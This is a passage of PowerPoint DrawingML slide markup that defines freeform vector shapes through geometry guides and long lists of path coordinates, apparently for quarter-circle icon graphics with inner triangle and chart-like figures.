                <a:gd name="T96" fmla="*/ 3459 w 6195"/>
                <a:gd name="T97" fmla="*/ 1517 h 7403"/>
                <a:gd name="T98" fmla="*/ 4672 w 6195"/>
                <a:gd name="T99" fmla="*/ 3743 h 7403"/>
                <a:gd name="T100" fmla="*/ 4687 w 6195"/>
                <a:gd name="T101" fmla="*/ 3816 h 7403"/>
                <a:gd name="T102" fmla="*/ 4657 w 6195"/>
                <a:gd name="T103" fmla="*/ 3916 h 7403"/>
                <a:gd name="T104" fmla="*/ 5995 w 6195"/>
                <a:gd name="T105" fmla="*/ 7202 h 7403"/>
                <a:gd name="T106" fmla="*/ 3496 w 6195"/>
                <a:gd name="T107" fmla="*/ 2231 h 7403"/>
                <a:gd name="T108" fmla="*/ 3113 w 6195"/>
                <a:gd name="T109" fmla="*/ 2210 h 7403"/>
                <a:gd name="T110" fmla="*/ 3076 w 6195"/>
                <a:gd name="T111" fmla="*/ 2231 h 7403"/>
                <a:gd name="T112" fmla="*/ 3060 w 6195"/>
                <a:gd name="T113" fmla="*/ 2262 h 7403"/>
                <a:gd name="T114" fmla="*/ 3092 w 6195"/>
                <a:gd name="T115" fmla="*/ 2992 h 7403"/>
                <a:gd name="T116" fmla="*/ 3118 w 6195"/>
                <a:gd name="T117" fmla="*/ 3008 h 7403"/>
                <a:gd name="T118" fmla="*/ 3428 w 6195"/>
                <a:gd name="T119" fmla="*/ 3013 h 7403"/>
                <a:gd name="T120" fmla="*/ 3465 w 6195"/>
                <a:gd name="T121" fmla="*/ 3003 h 7403"/>
                <a:gd name="T122" fmla="*/ 3512 w 6195"/>
                <a:gd name="T123" fmla="*/ 2257 h 7403"/>
                <a:gd name="T124" fmla="*/ 3496 w 6195"/>
                <a:gd name="T125" fmla="*/ 2231 h 7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195" h="7403">
                  <a:moveTo>
                    <a:pt x="3433" y="3213"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3134" y="3213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3134" y="3213"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3113" y="3217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3097" y="3228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3097" y="3228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3087" y="3244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3087" y="3265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3087" y="3559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3087" y="3559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3087" y="3580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3097" y="3596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3097" y="3596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3113" y="3606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3134" y="3611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3433" y="3611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3433" y="3611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3454" y="3606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3470" y="3596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3470" y="3596"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3480" y="3580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3485" y="3559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3485" y="3265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3485" y="3265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3480" y="3244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3470" y="3228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3470" y="3228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3454" y="3217"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3433" y="3213"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="400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0" y="278"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36" y="551"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="73" y="819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125" y="1086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183" y="1349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251" y="1606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="330" y="1858"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425" y="2110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525" y="2352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="635" y="2593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="750" y="2824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="882" y="3050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018" y="3275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1165" y="3491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1317" y="3701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480" y="3900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1648" y="4100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1827" y="4289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2015" y="4467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2205" y="4640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2409" y="4808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2614" y="4966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2824" y="5113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3044" y="5255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3271" y="5391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3501" y="5512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3738" y="5628"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3979" y="5732"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4226" y="5827"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4478" y="5911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4735" y="5985"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4992" y="6047"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4992" y="7402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6194" y="7402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6194" y="2194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6194" y="2194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6084" y="2178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5979" y="2162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5874" y="2141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5769" y="2121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5669" y="2089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5565" y="2052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5470" y="2015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5375" y="1974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5281" y="1926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5186" y="1874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5098" y="1821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5013" y="1764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4929" y="1701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4851" y="1637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4772" y="1569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4698" y="1496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4625" y="1422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4557" y="1343"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4493" y="1265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4430" y="1181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4373" y="1096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="1008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4268" y="913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4220" y="819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4179" y="724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4142" y="629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4105" y="525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4073" y="425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4053" y="320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4032" y="215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4016" y="110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4000" y="0"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="4657" y="3916"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4657" y="3916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4625" y="3953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4583" y="3984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4583" y="3984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4536" y="4005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4509" y="4011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4483" y="4011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2084" y="4011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2084" y="4011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2058" y="4011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2031" y="4005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2010" y="3995"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1984" y="3984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1984" y="3984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1963" y="3969"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1942" y="3953"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1926" y="3937"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1916" y="3916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1916" y="3916"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1889" y="3864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1884" y="3837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1884" y="3816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1884" y="3790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1889" y="3764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1900" y="3743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1911" y="3717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3107" y="1517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3107" y="1517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3124" y="1496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3139" y="1475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3160" y="1454"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3181" y="1438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3181" y="1438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3207" y="1427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3234" y="1417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3260" y="1412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3286" y="1412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3286" y="1412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3312" y="1412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3338" y="1417"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3365" y="1427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3386" y="1438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3386" y="1438"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3407" y="1454"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3428" y="1475"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3459" y="1517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4661" y="3717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4661" y="3717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4672" y="3743"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4683" y="3764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4683" y="3790"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4687" y="3816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4683" y="3837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4677" y="3864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4657" y="3916"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="5192" y="7202"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5596" y="6499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5995" y="7202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5192" y="7202"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3496" y="2231"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="3496" y="2231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3475" y="2215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3459" y="2210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3113" y="2210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3113" y="2210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3097" y="2215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3076" y="2231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3076" y="2231"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3066" y="2241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3060" y="2262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3087" y="2976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3087" y="2976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3092" y="2992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3102" y="3003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3102" y="3003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3118" y="3008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3139" y="3013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3428" y="3013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3428" y="3013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3448" y="3008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3465" y="3003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3465" y="3003"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3475" y="2992"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3480" y="2976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3512" y="2257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3512" y="2257"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3507" y="2241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3496" y="223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0" name="Freeform 4"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4664584" y="3218403"/>
              <a:ext cx="1167510" cy="976981"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 2194 w 7403"/>
                <a:gd name="T1" fmla="*/ 0 h 6195"/>
                <a:gd name="T2" fmla="*/ 2162 w 7403"/>
                <a:gd name="T3" fmla="*/ 215 h 6195"/>
                <a:gd name="T4" fmla="*/ 2121 w 7403"/>
                <a:gd name="T5" fmla="*/ 425 h 6195"/>
                <a:gd name="T6" fmla="*/ 2052 w 7403"/>
                <a:gd name="T7" fmla="*/ 629 h 6195"/>
                <a:gd name="T8" fmla="*/ 1974 w 7403"/>
                <a:gd name="T9" fmla="*/ 819 h 6195"/>
                <a:gd name="T10" fmla="*/ 1874 w 7403"/>
                <a:gd name="T11" fmla="*/ 1008 h 6195"/>
                <a:gd name="T12" fmla="*/ 1764 w 7403"/>
                <a:gd name="T13" fmla="*/ 1181 h 6195"/>
                <a:gd name="T14" fmla="*/ 1637 w 7403"/>
                <a:gd name="T15" fmla="*/ 1343 h 6195"/>
                <a:gd name="T16" fmla="*/ 1496 w 7403"/>
                <a:gd name="T17" fmla="*/ 1496 h 6195"/>
                <a:gd name="T18" fmla="*/ 1343 w 7403"/>
                <a:gd name="T19" fmla="*/ 1637 h 6195"/>
                <a:gd name="T20" fmla="*/ 1181 w 7403"/>
                <a:gd name="T21" fmla="*/ 1764 h 6195"/>
                <a:gd name="T22" fmla="*/ 1008 w 7403"/>
                <a:gd name="T23" fmla="*/ 1874 h 6195"/>
                <a:gd name="T24" fmla="*/ 819 w 7403"/>
                <a:gd name="T25" fmla="*/ 1974 h 6195"/>
                <a:gd name="T26" fmla="*/ 629 w 7403"/>
                <a:gd name="T27" fmla="*/ 2052 h 6195"/>
                <a:gd name="T28" fmla="*/ 425 w 7403"/>
                <a:gd name="T29" fmla="*/ 2121 h 6195"/>
                <a:gd name="T30" fmla="*/ 215 w 7403"/>
                <a:gd name="T31" fmla="*/ 2162 h 6195"/>
                <a:gd name="T32" fmla="*/ 0 w 7403"/>
                <a:gd name="T33" fmla="*/ 2194 h 6195"/>
                <a:gd name="T34" fmla="*/ 0 w 7403"/>
                <a:gd name="T35" fmla="*/ 6194 h 6195"/>
                <a:gd name="T36" fmla="*/ 551 w 7403"/>
                <a:gd name="T37" fmla="*/ 6158 h 6195"/>
                <a:gd name="T38" fmla="*/ 1086 w 7403"/>
                <a:gd name="T39" fmla="*/ 6069 h 6195"/>
                <a:gd name="T40" fmla="*/ 1606 w 7403"/>
                <a:gd name="T41" fmla="*/ 5943 h 6195"/>
                <a:gd name="T42" fmla="*/ 2110 w 7403"/>
                <a:gd name="T43" fmla="*/ 5769 h 6195"/>
                <a:gd name="T44" fmla="*/ 2593 w 7403"/>
                <a:gd name="T45" fmla="*/ 5559 h 6195"/>
                <a:gd name="T46" fmla="*/ 3050 w 7403"/>
                <a:gd name="T47" fmla="*/ 5312 h 6195"/>
                <a:gd name="T48" fmla="*/ 3491 w 7403"/>
                <a:gd name="T49" fmla="*/ 5029 h 6195"/>
                <a:gd name="T50" fmla="*/ 3900 w 7403"/>
                <a:gd name="T51" fmla="*/ 4714 h 6195"/>
                <a:gd name="T52" fmla="*/ 4289 w 7403"/>
                <a:gd name="T53" fmla="*/ 4367 h 6195"/>
                <a:gd name="T54" fmla="*/ 4640 w 7403"/>
                <a:gd name="T55" fmla="*/ 3989 h 6195"/>
                <a:gd name="T56" fmla="*/ 4966 w 7403"/>
                <a:gd name="T57" fmla="*/ 3580 h 6195"/>
                <a:gd name="T58" fmla="*/ 5255 w 7403"/>
                <a:gd name="T59" fmla="*/ 3150 h 6195"/>
                <a:gd name="T60" fmla="*/ 5512 w 7403"/>
                <a:gd name="T61" fmla="*/ 2693 h 6195"/>
                <a:gd name="T62" fmla="*/ 5732 w 7403"/>
                <a:gd name="T63" fmla="*/ 2215 h 6195"/>
                <a:gd name="T64" fmla="*/ 5911 w 7403"/>
                <a:gd name="T65" fmla="*/ 1716 h 6195"/>
                <a:gd name="T66" fmla="*/ 6047 w 7403"/>
                <a:gd name="T67" fmla="*/ 1202 h 6195"/>
                <a:gd name="T68" fmla="*/ 7402 w 7403"/>
                <a:gd name="T69" fmla="*/ 0 h 6195"/>
                <a:gd name="T70" fmla="*/ 3969 w 7403"/>
                <a:gd name="T71" fmla="*/ 3040 h 6195"/>
                <a:gd name="T72" fmla="*/ 3669 w 7403"/>
                <a:gd name="T73" fmla="*/ 4236 h 6195"/>
                <a:gd name="T74" fmla="*/ 3370 w 7403"/>
                <a:gd name="T75" fmla="*/ 3338 h 6195"/>
                <a:gd name="T76" fmla="*/ 3066 w 7403"/>
                <a:gd name="T77" fmla="*/ 4236 h 6195"/>
                <a:gd name="T78" fmla="*/ 2766 w 7403"/>
                <a:gd name="T79" fmla="*/ 3338 h 6195"/>
                <a:gd name="T80" fmla="*/ 2467 w 7403"/>
                <a:gd name="T81" fmla="*/ 4236 h 6195"/>
                <a:gd name="T82" fmla="*/ 2168 w 7403"/>
                <a:gd name="T83" fmla="*/ 3040 h 6195"/>
                <a:gd name="T84" fmla="*/ 1868 w 7403"/>
                <a:gd name="T85" fmla="*/ 1837 h 6195"/>
                <a:gd name="T86" fmla="*/ 2168 w 7403"/>
                <a:gd name="T87" fmla="*/ 1537 h 6195"/>
                <a:gd name="T88" fmla="*/ 3669 w 7403"/>
                <a:gd name="T89" fmla="*/ 1837 h 6195"/>
                <a:gd name="T90" fmla="*/ 3969 w 7403"/>
                <a:gd name="T91" fmla="*/ 3040 h 6195"/>
                <a:gd name="T92" fmla="*/ 6499 w 7403"/>
                <a:gd name="T93" fmla="*/ 598 h 6195"/>
                <a:gd name="T94" fmla="*/ 7202 w 7403"/>
                <a:gd name="T95" fmla="*/ 1002 h 6195"/>
                <a:gd name="T96" fmla="*/ 2168 w 7403"/>
                <a:gd name="T97" fmla="*/ 2435 h 6195"/>
                <a:gd name="T98" fmla="*/ 2766 w 7403"/>
                <a:gd name="T99" fmla="*/ 3040 h 6195"/>
                <a:gd name="T100" fmla="*/ 3066 w 7403"/>
                <a:gd name="T101" fmla="*/ 2435 h 6195"/>
                <a:gd name="T102" fmla="*/ 3669 w 7403"/>
                <a:gd name="T103" fmla="*/ 3040 h 6195"/>
                <a:gd name="T104" fmla="*/ 3066 w 7403"/>
                <a:gd name="T105" fmla="*/ 2435 h 6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403" h="6195">
                  <a:moveTo>
                    <a:pt x="2194" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2194" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2178" y="110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2162" y="215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2141" y="320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2121" y="425"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2089" y="525"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2052" y="629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2015" y="724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1974" y="819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1926" y="913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1874" y="1008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1821" y="1096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1764" y="1181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1701" y="1265"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1637" y="1343"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1569" y="1422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1496" y="1496"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1422" y="1569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1343" y="1637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1265" y="1701"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1181" y="1764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1096" y="1821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1008" y="1874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="913" y="1926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="819" y="1974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="724" y="2015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="629" y="2052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525" y="2089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425" y="2121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="320" y="2141"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="215" y="2162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="110" y="2178"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="6194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="6194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="278" y="6184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="551" y="6158"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="819" y="6121"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1086" y="6069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1349" y="6011"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1606" y="5943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1858" y="5864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2110" y="5769"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2352" y="5669"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2593" y="5559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2824" y="5444"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3050" y="5312"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3275" y="5176"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3491" y="5029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3701" y="4877"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3900" y="4714"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4100" y="4546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4289" y="4367"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4467" y="4179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4640" y="3989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4808" y="3785"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4966" y="3580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5113" y="3370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5255" y="3150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5391" y="2923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5512" y="2693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5628" y="2456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5732" y="2215"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5827" y="1968"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5911" y="1716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5985" y="1459"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6047" y="1202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7402" y="1202"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7402" y="0"/>
                  </a:lnTo>
